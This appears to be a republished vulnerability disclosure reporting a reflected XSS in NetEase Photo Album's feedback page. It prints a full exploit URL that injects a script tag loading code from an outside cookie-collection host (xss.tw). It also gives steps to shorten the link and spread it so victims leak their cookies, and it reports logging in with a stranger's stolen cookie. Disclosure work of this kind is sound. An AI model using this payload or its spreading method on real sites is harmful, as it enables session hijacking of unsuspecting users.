来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 网易相册用户意见反馈存在反射型xss,可轻易拿到用户cookie。前面提交了,剑总说没有证明案例,特此提交。。。囧1、在网易相册用户意见反馈存处,提问问题,然后访问自己得问题,...
|
网易相册用户意见反馈存在反射型xss,可轻易拿到用户cookie。
前面提交了,剑总说没有证明案例,特此提交。。。囧
1、在网易相册用户意见反馈存处,提问问题,然后访问自己得问题,此处未对用户的提问内容进行任何过滤,导致存在xss。 构造url如下:http://fankui.163.com/ft/question.fb?pid=3&cid=33518918&type=0&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert%28/xss/%29%22%3E%3Cscript%20src=http://xss.tw/762%3Ealert%281%29%3C/script%3E
 此处存在两处xss,出发点,从页面源代码中也可以看出来
 2、由于构造的url太长,可以使用shorten url:
http://goo.gl/RW5AQ
将此url发到网易微博或者其他交互量大的地方,只要受害者点击url就能触发xss,拿到受害者的网易cookie。
 不知道这是哪个用户,拿到其cookie,登陆如下:
  修复方案:
过滤! |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
